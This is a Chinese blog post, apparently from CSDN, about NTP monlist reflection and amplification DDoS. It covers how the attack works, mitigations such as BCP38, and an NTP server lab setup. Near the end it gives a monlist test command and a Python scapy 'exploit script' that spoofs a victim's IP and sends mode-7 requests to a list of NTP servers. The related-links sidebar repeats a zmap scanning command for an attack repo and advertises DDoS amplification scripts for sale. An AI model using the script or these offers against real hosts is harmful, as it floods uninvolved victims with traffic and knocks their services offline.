NTP反射放大攻击漏洞

已于 2024-01-15 15:28:45 修改
阅读量1.6k 收藏 33
点赞数 14
文章标签: 安全
于 2023-12-08 17:41:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51214674/article/details/134884175
版权

文章目录

什么是NTP

基于UDP协议的NTP(网络时间协议):使网络中各个计算机时间同步的一种协议

用途:把计算机时钟调节到世界调节时UDP

NTP反射放大攻击

  • UDP协议:面向无连接,客户端发送请求包源IP容易进行伪造

  • 反射攻击:修改客户端发送请求包中源IP为受害者IP,服务器端返回响应包返回到受害者IP

  • 放大攻击:一个请求包收到多个响应包

  • NTP反射放大攻击:一种分布式拒绝服务(DDoS)攻击

    服务器端回复一个带有欺骗源IP地址的数据包,而且至少有一个内置命令会对一个简短的请求发送一个长回复。这使得它成为DDoS工具的理想选择

    NTP 包含一个 monlist 功能( MON_GETLIST),主要用于监控 NTP 服务器。

    NTP 服务器响应monlist后就会返回响应包给和 NTP 服务器进行时间同步的最后 600 个客户端的 IP,响应包按照每 6 个 IP 进行分割,最多有 100 个响应包。

解决方案

  • 可以通过访问open NTP项目来检查网络上是否有开放的NTP服务器支持MONLIST命令运行。

  • NTP和其他基于udp的放大攻击都依赖于源IP地址欺骗。如果攻击者不能欺骗源IP地址,那么他们只能自己攻击DDoS。如果正在运行一个网络,那么应该确保遵循BCP38,并防止带有欺骗源地址的数据包离开主机网络。可以使用麻省理工学院的Spoofer项目的工具来测试你的网络当前是否遵循BCP38。

搭建NTP服务器

部署服务器端

Windows server 2008

  • 修改注册表

image-20231208170136727

依次展开数据项目,计算机\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer,把Enabled设置为1,打开NTP服务

image-20231208170437675

  • 打开NTP服务

image-20231208170649995

找到windows time

image-20231208170840055

image-20231208170915845

windows NTP命令行

启动:net start w32time
停止:net stop w32time

本机测试

如果有回显则服务正常

w32tm /stripchart /computer:127.0.0.1

image-20231208171550910

部署客户端

服务端部署成功后,如果要为客户端提供服务的话需要开放udp协议中的123端口,或者根据自身安全情况关闭防火墙。客户端下可以使用ntpdate命令来同步服务器时间,也可以使用chrony服务。

ntpdate

# 安装ntpdate服务
sudo apt-get install ntpdate

# 安装完成后, 同步时间。xxx.xxx.xxx.xxx为你服务器的IP地址,clock -w把时间写入硬件。
sudo ntpdate xxx.xxx.xxx.xxx && clock -w

chrony

chrony是一个时间同步服务,通过配置可以把一台服务器变为NTP服务端或客户端,这里只用到客户端的功能。

sudo apt-get install chrony

安装完成后打开配置文件

vim /etc/chrony.conf

如果做客户端的话,只需要修改其中的一行文件,最后保存退出。

# xxx为你的IP地址
server xxx.xxx.xxx.xxx

重启chrony服务,使用时间同步服务生效。

systemctl restart chronyd

实验

linux中,可以使用ntpdate、ntpdc进行反射测试。

模拟协议,客户端执行以下命令,执行成功时,说明服务端存在被攻击风险,可实施攻击。

ntpdate -n -c monlist x.x.x.x | wc -l(NTP服务的IP)

测试结果,此处内网由于数据量小

image-20231208173347591

Python利用脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import sys
from scapy.all import *

def attack(target, ntp_server):
    send(IP(dst=ntp_server, src=target)/(UDP(sport=52816)/NTP(version=2, mode=7, stratum=0, poll=3, precision=42)))

if __name__ == "__main__":
    if len(sys.argv) != 3:
        print("执行方法: python xxx.py  攻击目标  ntp服务器文件")
        sys.exit(1)

    target = sys.argv[1]
    ntp_server_file = sys.argv[2]
    for ntp_server in open(ntp_server_file, "r"):
        ntp_server = ntp_server.strip()
        if ntp_server != "":
            attack(target, ntp_server)
§666§
关注
  • 14
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
基于NTP反射放大攻击的DDoS追踪研究
01-14
摘 要:提出了一种利用NTP反射放大攻击的特点,通过对中国大陆开放公共NTP服务的主机定期发起主动探测(执行monlist指令),利用返回信息对全球范围NTP反射类DRDoS攻击事件进行长期追踪观察和统计分析。追踪从2014年2月开始,初始探测范围为大陆近1.4万台NTP服务主机,每隔2 h一个周期持续进行了164天,观测到了针对数十万个IP地址的疑似DDoS攻击行为。
NTP-Monlist-Amplification-Attack:演示NTP放大攻击
06-29
NTP-Monlist-放大-攻击
DDOS中的NTP放大攻击危害为什么这么大,如何进行有效的防护
HoewDec的博客
05-17 1003
在1992 年3月,NTP v3版本RFC-1305问世,该版本总结和综合了NTP先前版本和DTSS,正式引入了校正原则,并改进了时钟选择和时钟滤波的算法,而且还引入了时间消息发送的广播模式,这个版本取代了NTP的先前版本。比如说德迅DDoS防护服务,是以省骨干网的DDoS防护网络为基础,结合自研的DDoS攻击检测和智能防护体系,向您提供可管理的DDoS防护服务,自动快速的缓解网络攻击对业务造成的延迟增加,访问受限,业务中断等影响,从而减少业务损失,降低潜在DDoS攻击风险。NTP的防御措施是怎么样的呢?
Linux ntp放大攻击脚本,kali linux之DNS,NTP放大攻击
weixin_34486987的博客
04-30 439
DNS放大:产生大流量的攻击方法-----单机的带宽优势,巨大的单机数量形成的流量汇聚,利用协议特性实现放大效果的流量DNS协议放大效果----查询请求流量小,但响应流量可能非常巨大(dig ANY baidu.com @8.8.8.8流量放大约8倍)攻击原理:伪造源地址为被攻击目标地址,向递归域名查询服务器发起查询DNS服务器成为流量放大和实施攻击者,大量DNS服务器实现DDoSNTP放大:网络...
linux ntp攻击python脚本,(转)如何发现 NTP 放大攻击漏洞
weixin_39928106的博客
05-05 669
转自:http://drops.wooyun.org/tips/4715NTP 漏洞相关的文章在 Drops 已经有过了,并且不止一篇,之所以又翻译了这一片文章,是觉得文章的整体思路很不错,希望对看这篇文章的你有所帮助。BTW:本文翻译比较随意,但是并没有破坏原文含义。0x00 简介NTP 放大攻击其实就是 DDoS 的一种。通过 NTP 服务器,可以把很小的请求变成很大的响应,这些响应可以直接指...
NTP放大攻击
weixin_44110913的博客
11-03 1261
前言 本节学习NTP放大攻击 1、简介 Network Time Protocol 保证网络设备时间同步电子设备互相干扰导致时钟差异越来越大,影响应用正常运行、日志审计不可信服务端口UDP 123 攻击原理 NTP 服务提monlist (MON_GETLIST) 查询功能,监控NTP 服务器的状况客户端查询时,NTP服务...
Linux ntp放大攻击脚本,NTP放大攻击
weixin_36212560的博客
04-30 1225
首先NTP放大需要一台可以伪造IP的服务器,不能伪造欺骗的没有任何效果的。先上个效果图。ps:你需要一台服务器,而且能欺骗的服务器,不是服务器都可以的。不能欺骗的服务器攻击是没有任何效果的 这次带来安装攻击脚本的教学,此次不是首创,如有雷同,那就是巧合了!下面进入教学1.首先我们要准备攻击脚本,这个是必须的。进入重点:2.上传脚本到服务器3.重命名为.c。例如:ntp.c(重要的是要保存为.C)...
什么是NTP 放大
chujiuai1874的博客
08-21 420
NTP放大是一种分布式拒绝服务攻击 (DDoS),攻击者利用可公开访问的网络时间协议 (NTP)服务器,以用户数据报协议(UDP)流量对目标站点进行饱和攻击。 网络时间协议 (NTP)是最早的网络协议之一,对于由互联网连接的设备起到同步其时钟的作用。除了时钟同步之外,更旧版本的NTP还支持监...
ntp攻击
03-03
ntp攻击请先安装zmap解压缩git克隆并解压git clone https://github.com/Scholar-m/ntp-attack && cd ntp-attack && unzip ntp.zip扫描列表zmap -p 123 -M udp --probe-args=file:ntp_123_monlist.pkt -o 1.txt提权...
ddo放大教程+脚本
10-25
用国外G口放大 一个G口能打出30G左右的量,一直自己用的 加分价钱一分货,懂得人来 最好买两台 一台扫表 一台伪造发包 内附各种脚本 例如udp/ntp/syn/tcp/ack等 请勿使用此脚本攻击正规站 解压密码qq2682964474
windowserver2019配置NTP服务
04-08
Window Server 2019配置NTP服务是确保企业网络中所有计算机时间同步的重要步骤,这对于网络认证、日志记录和安全操作等都是至关重要的。NTP(Network Time Protocol)是一种用于同步网络中不同计算机时间的协议。在...
NTP反射放大攻击(一)知识点扫盲
qq_32350719的博客
03-19 2895
NTP反射放大攻击知识点扫盲 什么是NTP服务 NTP是网络时间协议(Network Time Protocol),它是用来同步网络中各个计算机的时间的协议 在计算机的世界里,时间非常地重要,例如对于火箭发射这种科研活动,对时间的统一性和准确性要求就非常地高,是按照A这台计算机的时间,还是按照B这台计算机的时间?NTP就是用来解决这个问题的,NTP(Network Time Protocol,网络...
NTP反射放大***分析
weixin_34377065的博客
07-17 161
前一阵子NTP放大***挺活跃的,现在来简单分析一下。***原理:1、 利用UDP协议的天然脆弱点,即不需要前期建立连接,直接就可以向client发送数据;2、 Internet上存在大量开放分布式的NTPServer,进行对同步请求的响应。3、 比DNS反射放大***威力更大的区别是NTP特有的一个Monlist功能,(Monlist指令,可以获取与目标NTP Ser...
NTP反射放大攻击(二)攻击场景搭建
qq_32350719的博客
03-19 2848
NTP反射放大攻击场景搭建 原理 攻击者冒充受害者(NTP客户端)的ip地址,向NTP服务器发送请求消息(很小),ntp服务器收到消息后向受害者返回响应数据包(很大) 安装NTP服务器 一般情况下,选择基本的桌面版安装环境,默认是已经装了的。如果没有安装,参照下面安装步骤 yum install -y ntp 修改/etc/ntp.conf 配置文件 ...
如何发现 NTP 放大攻击漏洞
chengfangang的专栏
01-23 7399
NTP 漏洞相关的文章在 Drops 已经有过了,并且不止一篇,之所以又翻译了这一片文章,是觉得文章的整体思路很不错,希望对看这篇文章的你有所帮助。 BTW:本文翻译比较随意,但是并没有破坏原文含义。 0x00 简介 NTP 放大攻击其实就是 DDoS 的一种。通过 NTP 服务器,可以把很小的请求变成很大的响应,这些响应可以直接指向到受害者的电脑。 NTP 放大使用的是 MONLIST
解决ntp漏洞问题
CN_LiTianpeng的博客
05-18 711
1.下载二进制包2.安装依赖3.解压并编译安装 1.下载二进制包 [root@localhost ltp]# wget http://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-4.2.8p15.tar.gz [root@localhost ltp]# ls ntp-4.2.8p15 ntp-4.2.8p15.tar.gz 2.安装依赖 [root@localhost ltp]# yum install \ gcc \ gcc-c++ \ op.
NTP服务一大波安全漏洞已修复,请尽快升级
bingyu1024的博客
08-25 624
在两周前,两位安全研究人员发现了NTP服务进程中的安全缺陷,他们已经开发了一个通过网络进行攻击漏洞验证程序,并使用它来模仿NTP通讯,从而可以利用臭名昭著的 1970漏洞让iOS设备变砖!由于各种智能设备都需要时间相关的功能,所以很多的设备都采用了NTP协议及NTP.org的服务进程,以确保系统时钟同步一致,在这个协议中发现的安全问题是非常严重的,因为这会让攻击者非常容易地造成破坏。虽然有多种NTP的服务进程,但是我们一般说的都是指NTP.org的ntpd服务进程,它也是大部分服务器和设备所用的版本。..
编程实现ntp反射式拒绝服务攻击
最新发布
06-06
NTP反射式拒绝服务攻击利用网络时间协议(NTP)服务器的monlist功能,通过构造伪造IP地址的UDP包向NTP服务器发起请求,使得服务器向伪造的IP地址返回大量的响应数据,从而造成目标服务器的带宽资源被消耗殆尽,最终导致服务不可用。 为了防止NTP反射式拒绝服务攻击,我们可以采取以下几种措施: 1. 禁用NTP服务器的monlist功能; 2. 使用网络设备上的访问控制列表(ACL)来限制NTP流量; 3. 在网络边界上实现反射攻击防御机制,例如使用防火墙、入侵防御系统等; 4. 对网络中的所有设备进行定期漏洞扫描和安全评估,及时更新安全补丁和升级设备。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

§666§

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值